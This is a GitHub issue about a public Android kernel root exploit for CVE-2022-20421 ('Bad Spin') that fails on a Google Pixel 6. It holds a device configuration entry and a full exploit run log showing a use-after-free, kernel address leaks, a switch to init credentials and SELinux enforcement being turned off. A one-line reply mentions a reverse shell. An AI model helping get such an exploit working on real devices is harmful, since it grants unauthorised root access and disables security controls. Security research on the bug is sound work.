Google Pixel 6 not working, stuck on "Could not open socket connection"
KingDiamondDev opened this issue · 1 comments
dev_config.h:
`.name = "Google Pixel 6",
.model = "Pixel 6",
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 7,
.kernel_version = KERNEL_VERSION(5, 10, 81),
.kimg_to_lm = pixel_kimg_to_lm,
.find_kbase = noop_kbase,`
Log from terminal:
- daemon not running; starting now at tcp:5037
- daemon started successfully
oriole:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
==========================================
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[x] Trigger use-after-free
[x] Finish spinning at spin_lock()
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[x] Shaping physical memory
[x] Trigger vulnerability... (mode = 3)
[x] Trigger use-after-free
[x] Waiting for timer threads
[x] Finish spinning at spin_lock()
.............................................*....
[x] Trying to escalate...
[x] Found corrupted ptmx and pipe.
[x] Leaking pipe buffer...
[x] Leaked pipe buffer oprerations: ffffffe371f3d9a8
[x] Leaked pipe buffer page : ffffffff01540080
[x] kallsyms found successfully!
[x] Kernel base: ffffffe36fc00000
[x] Found init_task: ffffffe3725cbec0
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff8863570000
[x] Successfully upgraded to stable RW primitives. \o/
[x] Success! Time to root
Finding init cred
init task_struct = ffffff880017b780
init cred = ffffff8825c3dc00 (usage 5)
Switch 11045:-1 to new creds (ffffff8825c3dc00)
task_struct (11045:-1) = ffffff8863575c80 cred = ffffff880910d0c0
Change cred and real_cred
Done
Setting selinux_state->enforce to 0
status page = ffffffff20209dc0
status page virt = ffffff8810277000
Done
Switch 10030:10030 to new creds (ffffff8825c3dc00)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff880665d3c0
Change cred and real_cred
Done
Switch 10030:10030 to new creds (ffffff880665d3c0)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff8825c3dc00
Change cred and real_cred
Done
Setting selinux_state->enforce to 1
status page = ffffffff20209dc0
status page virt = ffffff8810277000
Done
Switch 10030:10030 to new creds (ffffff8825c3dc00)
task_struct (10030:10030) = ffffff8893699280 cred = ffffff880665d3c0
Change cred and real_cred
Done
escalate exit status = 0
Reset process state
Could not open socket connection
It just hangs at the end. I've checked the other issues (opened and closed) but I don't believe I saw anything like this in there. Am I doing something wrong?
You need to set up reverse shell in adb
See the demo video in this lecture (near the end)